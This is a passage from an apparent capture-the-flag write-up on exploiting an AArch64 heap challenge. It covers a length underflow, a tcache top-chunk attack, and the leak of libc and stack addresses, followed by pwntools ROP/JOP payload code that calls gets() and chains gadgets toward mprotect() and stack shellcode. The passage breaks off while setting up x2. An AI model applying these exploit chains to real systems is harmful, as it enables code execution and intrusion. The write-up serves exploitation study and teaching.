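The integer conversions involved can be replayed in a few lines of Python. This is only an illustration of the arithmetic in the decompiled code above; `as_unsigned` is a helper invented for this example.

```python
def as_unsigned(value: int, bits: int) -> int:
    """Reinterpret a (possibly negative) integer as an unsigned value of `bits` bits."""
    return value & ((1 << bits) - 1)


# do_add with len = 0: read(0, ptr, len - 1) receives a size_t count
length = 0
read_count = as_unsigned(length - 1, 64)

# read() fails and returns -1, which is stored in the low 16 bits of size
read_return = -1
stored_size = as_unsigned(read_return, 16)

# do_edit then reads (unsigned int)LOWORD(size) - 1 bytes into the chunk
edit_count = stored_size - 1

if __name__ == "__main__":
    print(hex(read_count), hex(stored_size), hex(edit_count))
```

So a chunk that was allocated with a size of 0 can later be "edited" with up to 0xfffe bytes of attacker-controlled data.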
Since this post is about ROP-ing and the heap in Aarch64 is almost the same as x86, I’ll just be skimming over the heap exploit.
Because there was no free() in the binary, we overwrote the size of the top_chunk which got freed in the next allocation, giving us a leak.
Since the challenge server was using libc 2.27, tcache was available, which made our lives a lot easier. We could just overwrite the FD of the top_chunk to get an arbitrary allocation.
First we leak a libc address, then use it to get a chunk near environ, leaking a stack address. Finally, we allocate a chunk near the return address (saved x30 register) to start writing our ROP-chain.
Part 2 — The ROP-chain
Now starts the interesting part. How do we find ROP gadgets in Aarch64?
Fortunately for us, ropper supports Aarch64. But what kind of gadgets exist in Aarch64 and how can we use them?
Aaaaand we are blasted with a shitload of gadgets.
Most of these are actually not very useful, as the ret depends on the x30 register. The address in x30 is where the gadget will return when it executes a ret.
If the gadget doesn’t modify x30 in a way we can control, we won’t be able to control the execution flow and get to the next gadget.
So to get a ROP-chain running in Aarch64, we can only use the gadgets which:
perform the function we want
pop x30 from the stack
ret
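The three criteria above can be turned into a rough filter over gadget listings. The sketch below works on gadget text in the `instr ; instr ; ret` form used in this post; the regular expression is a heuristic written for this example (it only looks for an `ldp`/`ldr` that loads x30 from the stack) and is not a ropper feature.

```python
import re

# An ldp/ldr instruction that loads x30 from an sp-relative address
RESTORES_X30 = re.compile(r"\bld[pr]\b[^;]*\bx30\b[^;]*\[sp")


def is_chainable(gadget: str) -> bool:
    """True if the gadget reloads x30 from the stack and then ends with ret."""
    instrs = [part.strip() for part in gadget.split(";") if part.strip()]
    if not instrs or instrs[-1] != "ret":
        return False
    return any(RESTORES_X30.search(instr) for instr in instrs[:-1])


if __name__ == "__main__":
    candidates = [
        "ldr x0, [x29, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret",
        "mov x1, x0 ; ret",
    ]
    for gadget in candidates:
        print(is_chainable(gadget), gadget)
```

Gadgets that fail this check are not useless, they just need another gadget to set up x30 for them first.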
With our heap exploit, we were only able to allocate a 0x98 chunk on the stack and the whole open/read/write chain would take a lot more space, so the first thing we need is to read in a second ROP-chain.
One way to do that is to call gets(stack_address), so we can basically write an infinite ROP-chain on the stack (provided no newlines).
So how do we call gets()? It’s a libc function and we already have a libc leak, the only thing we need is to get the address of gets in x30 and a stack address in x0 (function parameters are passed in x0 to x7).
After a bit of gadget hunting, here is the gadget I settled upon:
assume that the return address is in x30 (it would be in a normal execution) and thus it tries to preserve it on the stack along with x29.
Unfortunately for us, since we reached there with ret, the x30 holds the address of gets itself.
If this continues, it would pop the preserved x30 at the end of gets and then jump back to gets again in an infinite loop.
To bypass it, we use a simple trick and return at gets+0x8, skipping the preservation. This way, when it pops x30 at the end, we would be able to control it and jump to our next gadget.
This is the rough sketch of our first stage ROP-chain:
from pwn import p64  # pwntools: pack a 64-bit little-endian value
gadget = libcbase + 0x00062554 #0x0000000000062554 : ldr x0, [x29, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret // to control x0
payload = b""
payload += p64(next_x29) + p64(gadget) + p64(0x0) + p64(0x8) # 0x0 and 0x8 are the local variables that shouldn't be overwritten
payload += p64(next_x29) + p64(gets_address) + p64(0x0) + p64(new_x29_stack) # Link register pointing to the next frame + gets() of libc + just a random stack variable + param loaded by the gadget into x0 (for param of gets)
Now that we have infinite space for our second stage ROP-chain, what should we do?
At first we decided to do the open/read/write all in ROP but it would make it unnecessarily long and complex, so instead we mprotect() the stack to make it executable and then jump to shellcode we placed on the stack.
mprotect takes 3 arguments, so we need to control x0, x1 and x2 to succeed.
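As a reminder of what ends up in those three registers: mprotect(addr, len, prot) wants a page-aligned address, a length, and the protection bits. A minimal sketch of the values, assuming 4 KiB pages (an assumption, Aarch64 kernels can also be configured with larger pages) and a made-up stack address:

```python
PAGE_SIZE = 0x1000  # assumed 4 KiB pages
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


def mprotect_args(stack_addr: int, length: int) -> dict:
    """Register values for mprotect(addr, len, prot) following the x0..x2 convention."""
    return {
        "x0": stack_addr & ~(PAGE_SIZE - 1),           # addr must be page aligned
        "x1": length,                                  # rounded up to whole pages by the kernel
        "x2": PROT_READ | PROT_WRITE | PROT_EXEC,      # rwx = 7
    }


if __name__ == "__main__":
    # 0xffffc1234568 is a hypothetical leaked stack address
    for reg, value in mprotect_args(0xFFFFC1234568, 0x500).items():
        print(reg, hex(value))
```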
Well, we began gadget hunting again. We already control x0, so we found this gadget:
gadget_1 = 0x00000000000ed2f8 : mov x1, x0 ; ret
At first glance, it looks perfect, copying x0 into x1. But if you have been paying close attention, you would realize it doesn’t modify x30, so we won’t be able to control execution beyond this.
What if we take a page from JOP (jump oriented programming) and find a gadget which gives us control of x30 and then jumps (not calls) to another user controlled address?
The first gadget here gives us control of x19 and x20, the second one moves x19 into x3 and calls x20.
Chaining these two, we can control x3 and still have control over the execution.
Here’s our plan:
Have x0 as 0x500 (mprotect length) with the same gadget we used before
Use gadget_3 to make x19 = gadget_1 and x20 = gadget_2
return to gadget_4 from gadget_3, making x3 = x19 (gadget_1)
gadget_4 calls x20 (gadget_2)
gadget_2 gives us a controlled x30 and jumps to x3 (gadget_1)
gadget_1 moves x0 (0x500) into x1 and returns
Here’s the rough code equivalent:
payload = b""
payload += p64(next_x29) + p64(gadget_3) + p64(0x0) * x # x depends on the stack layout; returns to gadget_3
payload += p64(next_x29) + p64(gadget_4) + p64(gadget_1) + p64(gadget_2) + p64(0x0) * 4 # moves gadget_1/gadget_2 into x19/x20 and returns to gadget_4
payload += p64(next_x29) + p64(next_gadget) #setting up for the next gadget and moving x19 into x3. x20 (gadget_2) is called from gadget_4
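If the hand-offs between the four gadgets are hard to follow, the plan can be replayed with a toy model. The sketch below only models the register effects described in the plan (it ignores x29, padding and real addresses), and the stack layout it consumes is simplified and invented for this illustration, so it does not match the byte-level payload.

```python
def run_chain(stack, x0):
    """Replay the gadget_3 -> gadget_4 -> gadget_2 -> gadget_1 hand-off symbolically."""
    regs = {"x0": x0, "x1": 0, "x3": None, "x19": None, "x20": None, "x30": None}
    stack = list(stack)
    trace = []

    def gadget_1():  # mov x1, x0 ; ret
        regs["x1"] = regs["x0"]
        return regs["x30"]

    def gadget_2():  # reload x30 from the stack, then jump (not call) to x3
        regs["x30"] = stack.pop(0)
        return regs["x3"]

    def gadget_3():  # load x19, x20 and x30 from the stack ; ret
        regs["x19"] = stack.pop(0)
        regs["x20"] = stack.pop(0)
        regs["x30"] = stack.pop(0)
        return regs["x30"]

    def gadget_4():  # mov x3, x19 ; blr x20
        regs["x3"] = regs["x19"]
        regs["x30"] = "after_gadget_4"  # blr clobbers x30 with its own return address
        return regs["x20"]

    gadgets = {"gadget_1": gadget_1, "gadget_2": gadget_2,
               "gadget_3": gadget_3, "gadget_4": gadget_4}

    pc = "gadget_3"
    while pc in gadgets:
        trace.append(pc)
        pc = gadgets[pc]()
    return regs, trace, pc


if __name__ == "__main__":
    # values consumed in order: x19, x20, x30 (for gadget_3), then x30 (for gadget_2)
    regs, trace, final_pc = run_chain(
        ["gadget_1", "gadget_2", "gadget_4", "next_gadget"], x0=0x500)
    print(trace, hex(regs["x1"]), final_pc)
```

The important detail is that gadget_2 reloads x30 after the `blr` in gadget_4 has clobbered it, which is why the final `ret` in gadget_1 lands on the next gadget instead of returning into gadget_4.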
That was haaard, now let’s see how we can control x2…